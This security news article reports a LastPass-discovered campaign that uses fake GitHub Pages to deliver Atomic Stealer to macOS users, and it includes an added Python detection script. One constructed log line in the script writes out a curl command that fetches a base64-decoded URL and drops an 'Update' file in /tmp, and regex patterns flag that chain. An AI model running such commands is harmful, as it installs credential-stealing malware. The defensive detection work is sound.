Stratos Ally

Fake GitHub Pages Deliver Atomic Stealer in macOS Malware Campaign


StratosAlly


LastPass has warned of a widespread malware campaign in which attackers are abusing GitHub repositories to distribute Atomic Stealer (AMOS), an infostealer targeting Apple macOS systems. The company’s Threat Intelligence, Mitigation, and Escalation (TIME) team uncovered the operation earlier this month.

The campaign impersonates more than 100 popular brands, including password managers (LastPass, 1Password), financial firms (Citibank, Fidelity, Charles Schwab), cryptocurrency apps (Bitpanda, Blue Wallet), and productivity tools (Notion, Basecamp, Obsidian). Attackers combine SEO manipulation with developer platforms like GitHub to take advantage of user trust, showing that macOS is no longer just a minor target for cybercrime.

Attackers rely on SEO poisoning to push fraudulent GitHub pages to the top of Google and Bing search results. These pages display “Install on MacBook” links that redirect to secondary domains. There, victims are instructed to paste a terminal command that performs a cURL request to a base64-encoded URL hosted at bonoud[.]com. This request downloads an installer labeled “Update” to the system’s temporary directory, which is actually the AMOS payload.
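As an added illustration (not code from LastPass or this article), the following detection pass runs over constructed process-execution log lines and flags the chain described above: a curl fetch paired with a base64-decoded argument or a download into a temporary directory. The log format, the user/pid fields and the example.invalid URL are assumptions.

```python
import re

# Constructed sample process-execution log lines in a hypothetical
# "<timestamp> user=<name> pid=<n> cmd=<command line>" format. Only pid 4150
# mimics the chain in the article (curl, base64-decoded URL, download named
# "Update" in a temp dir); its URL decodes to https://example.invalid/Update.
SAMPLE_LOGS = [
    "2025-09-16T10:01:02Z user=alice pid=4123 cmd=ls -la /Users/alice",
    "2025-09-16T10:02:45Z user=alice pid=4150 cmd=/bin/sh -c curl -fsSL "
    "$(echo aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvVXBkYXRl | base64 -D) -o /tmp/Update",
    "2025-09-16T10:03:10Z user=alice pid=4177 cmd=curl -fsSL "
    "https://example.invalid/page.html -o /Users/alice/page.html",
    "2025-09-16T10:04:00Z user=alice pid=4201 cmd=base64 -D /Users/alice/note.b64",
]

LOG_RE = re.compile(r"pid=(?P<pid>\d+) cmd=(?P<cmd>.*)$")

# One regex per observable step of the lure described in the article.
INDICATORS = {
    "curl": re.compile(r"\bcurl\b"),
    "base64_decode": re.compile(r"\bbase64\s+(?:-D|-d|--decode)\b"),
    "temp_dir_output": re.compile(
        r"(?:-o|--output)\s+[\"']?(?:/tmp/|/private/tmp/|/var/folders/|\$TMPDIR/?)"),
    "update_filename": re.compile(r"/Update\b"),
}

def score_command(cmd: str) -> list[str]:
    """Return the names of the indicators present in one command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]

def is_suspicious(hits: list[str]) -> bool:
    # A lone curl download or base64 decode is ordinary developer activity;
    # a fetch paired with a decoded argument or a temp-dir drop is the lure.
    return "curl" in hits and ("base64_decode" in hits or "temp_dir_output" in hits)

def scan(lines: list[str]) -> list[tuple[int, list[str]]]:
    """Return (pid, indicators) for every log line worth escalating."""
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        if m:
            hits = score_command(m.group("cmd"))
            if is_suspicious(hits):
                findings.append((int(m.group("pid")), hits))
    return findings

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_LOGS):
        print(f"pid {pid}: {', '.join(hits)}")
```

Only pid 4150 is escalated; the ordinary curl download and the stand-alone base64 decode stay below the threshold.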

Atomic Stealer, first seen in April 2023, exfiltrates browser autofill entries, stored credentials, cryptocurrency wallet keys and local files. Its deployment in this campaign signals a growing move by financially motivated actors to target macOS.

LastPass confirmed its own brand was spoofed, with two GitHub Pages posted by the user “modhopmduck476” on September 16. These were swiftly reported and removed, but the attackers continue to create new accounts to circumvent takedowns.

LastPass said it is continuing to monitor the campaign, submit fraudulent repositories for takedown, and has shared a comprehensive set of indicators of compromise (IoCs) to help other security teams identify related activity.

The campaign illustrates how cybercriminals are now combining search engine manipulation with trusted developer platforms such as GitHub to deceive users, signaling that macOS has moved firmly into the spotlight as a priority target for online crime rather than remaining on the sidelines.
